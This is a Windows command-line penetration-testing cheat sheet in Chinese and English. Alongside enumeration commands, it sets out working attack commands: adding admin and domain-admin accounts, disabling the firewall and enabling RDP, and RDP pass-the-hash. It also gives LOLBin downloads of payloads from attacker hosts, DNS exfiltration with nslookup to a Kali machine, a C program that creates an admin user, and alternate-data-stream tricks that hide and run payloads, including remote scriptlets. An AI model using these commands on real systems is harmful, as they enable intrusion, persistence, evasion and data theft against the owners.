系统信息
版本和补丁信息
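:: NOTE: '#' is NOT a comment character in cmd.exe. The '#...' annotations in this cheat sheet are for the reader;
:: strip them before pasting a line, or the text is passed to the command as an extra argument.
:: wmic is deprecated and may be absent on recent Windows 11 builds; fall back to PowerShell Get-CimInstance / Get-ComputerInfo.
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #architecture (x86 / AMD64 / ARM64)
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #only these fields
wmic computersystem LIST full #computer information
wmic qfe get Caption,Description,HotFixID,InstalledOn #installed hotfixes (compare InstalledOn with the build date to spot a patch gap)
wmic qfe list brief #updates
hostname
DRIVERQUERY #third-party drivers: check versions against a known-vulnerable-driver list (BYOVD candidates)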
环境
set #列出所有环境变量
需要强调的一些环境变量:
- COMPUTERNAME: 计算机名称
- TEMP/TMP: 临时文件夹
- USERNAME: 用户名
- HOMEPATH/USERPROFILE: 主目录
- windir: C:\Windows
- OS: 操作系统类型（NT 系列系统上为 Windows_NT）
- LOGONSERVER: 域控制器名称（形如 \\DC01，带有前导的 \\）
- USERDNSDOMAIN: 与DNS一起使用的域名
- USERDOMAIN: 域的 NetBIOS 名称
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DC的DNS请求
挂载磁盘
:: Enumerate drive letters; the second form also shows the UNC path behind mapped network drives (providername)
(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
wmic logicaldisk get caption,description,providername
回收站
dir C:$Recycle.Bin /s /b
流程、服务和软件
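schtasks /query /fo LIST /v #verbose dump of scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v | findstr /C:"TaskName" /C:"Task To Run" /C:"Run As User" #cmd-native: task, its command and the account it runs as (look for SYSTEM + writable binaries)
:: The next line mixes cmd and Linux syntax (";", cat, grep): run the schtasks part on the target, copy schtasks.txt off, and grep it on the attacker box
schtasks /query /fo LIST /v > schtasks.txt; cat schtasks.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
tasklist /V #process list with owning user
tasklist /SVC #map processes to the services they host
net start #running Windows services
wmic service list brief #list services
sc query #list services
dir /a "C:\Program Files" #installed software
dir /a "C:\Program Files (x86)" #installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #installed software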
域信息
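# Common AD information
echo %USERDOMAIN% #domain NetBIOS name
echo %USERDNSDOMAIN% #domain DNS name
echo %logonserver% #domain controller name
set logonserver #domain controller name
set log #every variable whose name starts with "log"
gpresult /V #policies applied to this host/user (RSoP)
wmic ntdomain list /format:list #domain and domain-controller information
# Users
dsquery user #all users (dsquery is only present where the AD DS / RSAT tools are installed, e.g. on a DC)
net user /domain #list all domain users
net user <ACCOUNT_NAME> /domain #details about that user
net accounts /domain #password and lockout policy (check lockout threshold before any password spraying)
wmic useraccount list /format:list #local and domain accounts that have logged on to this device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET #details about one user
wmic sysaccount list /format:list #system accounts used as service accounts
# Groups
net group /domain #domain groups
net localgroup administrators /domain #members of the domain's built-in Administrators group (includes the "Domain Admins" group)
net group "Domain Admins" /domain #users with domain admin rights
net group "domain computers" /domain #computers joined to the domain
net group "Domain Controllers" /domain #domain controller computer accounts
wmic group list /format:list #all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #group members
wmic path win32_groupuser where (groupcomponent="win32_group.name=\"domain admins\",domain=\"DOMAIN_NAME\"") #group members
# Computers
dsquery computer #all computers
net view /domain #computers in the domain (relies on the browse list, so it may be incomplete)
nltest /dclist:<DOMAIN> #list domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #all computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #all computers (DNS names)
# Trusts
nltest /domain_trusts #map trust relationships (switch repaired: it is /domain_trusts)
# Get all objects inside a container/OU (example DN)
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"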
日志和事件
#使用另一个凭据进行安全查询
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINEzachary /p:0987654321
用户和组
用户
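#Myself
whoami /all #everything about me: SID, groups and which privileges are enabled in the token
whoami /priv #privileges only
# Local users
net users #all users
dir /b /ad "C:\Users"
net user %username% #details about me
net accounts #password requirements
wmic USERACCOUNT Get Domain,Name,Sid
net user /add [username] [password] #create a user (generates an account-management event if auditing is on)
# Find other users
qwinsta #is anyone else logged on?
#Spawn a new cmd.exe with other credentials that are used only for network authentication (impersonation over the network).
#/netonly does not validate the password locally: the shell opens even if the password is wrong and you only find out on first network access.
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
#As an administrator, check current logon sessions with logonsessions from Sysinternals
logonsessions.exe
logonsessions64.exe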
组
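#Local
net localgroup #all available groups
net localgroup Administrators #group details (Administrators)
net localgroup administrators [username] /add #add a user to Administrators
#Domain
net group /domain #domain groups
net group /domain <domain_group_name> #users belonging to the group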
列出会话
:: Interactive (RDP/console) sessions and cached Kerberos logon sessions on this host
qwinsta
klist sessions
密码策略
net accounts
凭证
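cmdkey /list #list stored credentials (targets usable with runas /savecred)
vaultcmd /listcreds:"Windows Credentials" /all #inspect the Windows Credential Manager
rundll32 keymgr.dll,KRShowKeyMgr #opens the Stored User Names and Passwords dialog; needs an interactive GUI session (no space after the comma)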
用户持久化（Persistence with users）
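:: OPSEC: every line below is an account-management change that is logged on the DC/host when auditing is enabled
:: and will be rejected if "password" does not meet the password policy. Record what you add so it can be removed.
# Add a domain user and put it in the Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
# Add a local user and put it in the local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD
# Add a user to groups on the target
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add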
网络信息
接口,路由,端口,主机和DNSCache
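ipconfig /all #detailed TCP/IP configuration of this host
route print #routing table
arp -a #ARP cache (neighbouring hosts)
netstat -ano #open ports with owning PID (map the PID with tasklist /SVC)
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"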
防火墙
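:: "netsh firewall" is the legacy context (deprecated since Windows 7/2008 R2 and may be missing on current builds);
:: "netsh advfirewall" is the supported equivalent. Disabling whole profiles is very visible — prefer one allow rule.
netsh firewall show state #firewall state and open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config #show firewall configuration
Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off #disable
NetSh Advfirewall set allprofiles state on #enable
netsh firewall set opmode disable #disable (legacy syntax)
#How to open a port
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389 #advfirewall equivalent of the line above
#Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #reported as not needed
::sc config TermService start= auto #reported as not needed
::net start Termservice #reported as not needed
#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
#Enable Remote Assistance:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
#Ninja combo (new admin user, RDP + Remote Assistance + firewall allow). Chained with "&", so later steps still run if an
#earlier one fails (e.g. password rejected by policy) — read the output. Use "&&" if you want it to stop at the first failure.
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
::Connect to RDP from the attacker box (hash or password). /pth only works when Restricted Admin mode is enabled on the target
::(HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin = 0); otherwise use the password.
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49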
共享
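net view #list of computers in the browse list
net view /all /domain [domainname] #shares in the domain (/all includes hidden $ shares)
net view \\computer /ALL #list the shares of a computer
net use x: \\computer\share #mount a share locally (the mapping is visible with "net use" and survives until deleted)
net share #current local shares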
Wifi
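netsh wlan show profile #saved AP SSIDs
netsh wlan show profile <SSID> key=clear #clear-text PSK (recent builds may require an elevated prompt for key=clear)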
SNMP
reg query HKLMSYSTEMCurrentControlSetServicesSNMP /s
Network Interfaces
ipconfig /all
ARP table
arp -A
下载
Bitsadmin.exe
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:dataplayfolderautoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
CertReq.exe
CertReq -Post -config https://example.org/ c:windowswin.ini output.txt
Certutil.exe
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
Desktopimgdownldr.exe
set "SYSTEMROOT=C:WindowsTemp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Diantz.exe
diantz.exe \remotemachinepathToFilefile.exe c:destinationFolderfile.cab
Esentutl.exe
esentutl.exe /y \live.sysinternals.comtoolsadrestore.exe /d \otherwebdavserverwebdavadrestore.exe /o
Expand.exe
expand \webdavfolderfile.bat c:ADSfile.bat
Extrac32.exe
extrac32 /Y /C \webdavserversharetest.txt C:foldertest.txt
Findstr.exe
findstr /V /L W3AllLov3DonaldTrump \webdavserverfolderfile.exe > c:ADSfile.exe
Ftp.exe
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
GfxDownloadWrapper.exe
C:WindowsSystem32DriverStoreFileRepositoryigdlh64.inf_amd64_[0-9]+GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Hh.exe
HH.exe http://some.url/script.ps1
Ieexec.exe
ieexec.exe http://x.x.x.x:8080/bypass.exe
Makecab.exe
makecab \webdavserverwebdavfile.exe C:Folderfile.cab
MpCmdRun.exe
MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable
Replace.exe
replace.exe \webdav.host.comfoobar.exe c:outdir /A
Excel.exe
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Powerpnt.exe
Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Squirrel.exe
squirrel.exe --download [url to package]
Update.exe
Update.exe --download [url to package]
Winword.exe
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Wsl.exe
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Misc
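cd #print the current directory
cd C:\path\to\dir #change directory
dir #list the current directory
dir /a:h C:\path\to\dir #list hidden files
dir /s /b #recursive listing without clutter
time #current time
date #current date
shutdown /r /t 0 #reboot immediately (disruptive — not something to run on a production host without agreement)
type <file> #print the file from the first byte onwards
#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #uses a credential already stored for that user (see cmdkey /list); it does not prompt
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
#Hide
attrib +h file #set hidden
attrib -h file #unset hidden
#Give yourself full control over a file you own. Repaired: /e and /p are cacls flags; icacls uses /grant and /remove
icacls <FILE_PATH> /grant <USERNAME>:F /t
icacls <FILE_PATH> /remove <USERNAME> /t #remove the user's ACE
#Recursive copy to an SMB share
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
#Exe2bat: converts an exe into a .bat that recreates it (tool not shown here)
#ADS
dir /r #detect ADS
more file.txt:ads.txt #read an ADS
powershell (Get-Content file.txt -Stream ads.txt)
# Get the error message for an error code
net helpmsg 32 #32 is the error code in this example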
Bypass Char Blacklisting
:: Substring expansion %VAR:~start,len% builds characters from an environment variable instead of typing them
echo %HOMEPATH:~6,-11% #
:: "^" is the cmd escape character and is dropped before execution, so the blacklisted word never appears literally
who^ami #whoami
DOSfuscation
生成混淆的CMD命令行
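# Run in PowerShell on the attacker box: clone the module, import it and start its interactive menu
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
# The lines below are typed at the Invoke-DOSfuscation prompt (not at the PowerShell prompt):
# "help" lists menu options, "SET COMMAND ..." sets the command to obfuscate, "encoding" opens the encoding sub-menu
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding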
Listen address ACLs
您无需管理员身份即可在 http://+:80/Temporary_Listen_Addresses/ 上侦听：该 URL 前缀的 ACL 默认授予 Everyone 保留权限，用下面的命令可以验证。
netsh http show urlacl
Manual DNS shell
Attacker (Kali) 必须使用以下两个选项之一:
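sudo responder -I <iface> #Active: Responder answers the victim's lookups itself and logs the query names
# Passive: just sniff the DNS queries. Repaired: "dst ip" is not a valid BPF primitive, the host qualifier is "dst host".
sudo tcpdump -i <iface> -A udp and dst port 53 and dst host <KALI_IP>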
Victim
for /f 标记（token）技术：它允许我们执行一条命令，取每行输出的前 X 个单词，并通过 DNS 查询把它们发送到攻击者的服务器。
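:: Interactive cmd syntax (%a). Inside a .bat file the loop variables must be doubled (%%a). Each token becomes a DNS label,
:: so tokens longer than 63 characters or containing characters that are illegal in hostnames are not resolved/sent.
for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one (8.3 short name)
#More complex commands (the pipe inside the for /f command must be escaped as ^|)
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #enabled privileges, one query per line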
您还可以重定向输出,然后读取输出。
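:: Repaired: "finstr" -> "findstr". Write the output to a world-readable location first, then exfiltrate it line by line.
whoami /priv | findstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>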
从C代码调用CMD
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
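// When executed from an elevated (Administrator) context this program creates a local user
// and adds it to the local Administrators group by shelling out to net.exe.
// Build: i686-w64-mingw32-gcc addmin.c -o addmin.exe
// Optional packing: upx -9 addmin.exe
// Returns EXIT_SUCCESS only if both net commands exit with 0; the original ignored their status,
// so a non-elevated run or a password-policy rejection went unnoticed.
int main(void) {
    /* system() returns the child's exit status; net.exe exits non-zero on failure. */
    if (system("net users otherAcc 0TherAcc! /add") != 0)
        return EXIT_FAILURE;
    if (system("net localgroup administrators otherAcc /add") != 0)
        return EXIT_FAILURE;
    return EXIT_SUCCESS;
}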
备用数据流CheatSheet(ADS/备用数据流)
Taken from https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
##Add content to ADS###
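:: Each line stores a payload in the named stream "file:stream" of an existing (often legitimate, already-whitelisted) file
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct ^scrobj.dll > fakefile.doc:reg32.bat
:: PowerShell generic form (parameter names repaired):
Set-Content -Path {path to the file} -Stream {name of the stream}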
## Discover ADS content
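dir /R #cmd: shows streams next to each file
streams.exe <c:\path\to\file> #Sysinternals binary (-s for recursive, -d to delete streams)
:: PowerShell (typo "fie.txt" repaired):
Get-Item -Path .\file.txt -Stream *
gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'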
##Extract content from ADS###
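:: Pull the stream back out into a regular file (or just read it with "more <")
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o
more < c:\ads\file.txt:test.exe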
##Executing the ADS content###
* WMIC
wmic process call create '"C:Program Files (x86)TeamViewerTeamViewer12_Logfile.log:evil.exe"'
* Rundll32
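:: Load a DLL straight from a stream; the advpack/ieadvpack RegisterOCX variants call the DLL's DllRegisterServer export
rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll
rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll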
* Cscript
cscript "C:Program Files (x86)TeamViewerTeamViewer13_Logfile.log:Script.vbs"
* Wscript
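wscript c:\ads\file.txt:script.vbs
:: Stage a one-line JScript loader in a stream under %temp% and run it; the GetObject("script:...") moniker fetches remote code
echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js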
* Forfiles
forfiles /p c:windowssystem32 /m notepad.exe /c "c:tempshellloader.dll:bginfo.exe"
* Mavinject.exe
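:: Start a 32-bit notepad, note its PID, stage the DLL in a stream, then inject it with the WOW64 mavinject.exe
c:\windows\SysWOW64\notepad.exe
tasklist | findstr notepad
:: example output: notepad.exe 4172 31C5CE94259D4006 2 18,476 K   (4172 is the PID used below)
type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
:: The WinSxS folder name is build-specific (10.0.16299.15 here); locate yours with: dir /s /b c:\windows\WinSxS\mavinject.exe
c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"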
* MSHTA
mshta "C:Program Files (x86)TeamViewerTeamViewer13_Logfile.log:helloworld.hta"
(Does not work on Windows 10 1903 and newer)
* Control.exe
control.exe c:windowstaskszzz:notepad_reflective_x64.dll
https://twitter.com/bohops/status/954466315913310209
* Create service and run
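:: Requires admin. The inner quotes are escaped with \" so the whole command line becomes the service's binPath.
:: cmd.exe is not a real service image, so "sc start" reports a timeout/1053-style error, but the command still runs.
:: Clean up afterwards with: sc delete evilservice
sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
sc start evilservice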
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
* Powershell.exe
powershell -ep bypass - < c:temp:ttt
* Powershell.exe
powershell -command " & {(Get-Content C:ADS1.txt -Stream file.exe -Raw | Set-Content c:ADSfile.exe) | start-process c:ADSfile.exe}"
* Powershell.exe
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:adsfolder:file.exe}
* Regedit.exe
regedit c:adsfile.txt:regfile.reg
* Bitsadmin.exe
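:: The transfer itself is harmless; the notification command line (SetNotifyCmdLine) is what runs the stream when the job completes
bitsadmin /create myfile
bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
bitsadmin /RESUME myfile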
* AppVLP.exe
AppVLP.exe c:windowstracingtest.txt:ha.exe
* Cmd.exe
cmd.exe - < fakefile.doc:reg32.bat
https://twitter.com/yeyint_mth/status/1143824979139579904
* Ftp.exe
ftp -s:fakefile.txt:aaaa.txt
https://github.com/sailay1996/misc-bin/blob/master/ads.md
* ieframe.dll , shdocvw.dll (ads)
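:: Two steps that were run together on one line: write a .url-style shortcut into a stream, then open it via ieframe/shdocvw
echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt
rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt
rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt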
https://github.com/sailay1996/misc-bin/blob/master/ads.md
* bash.exe
:: Requires WSL. bash reads the script from the stream via stdin, or via command substitution in the second form
echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh
bash.exe -c $(fakefile.txt:payload.sh)
https://github.com/sailay1996/misc-bin/blob/master/ads.md
* Regsvr32
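:: Copy the real scrobj.dll into a stream and register it from there; /i: points at the remote scriptlet that gets executed
type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS
regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS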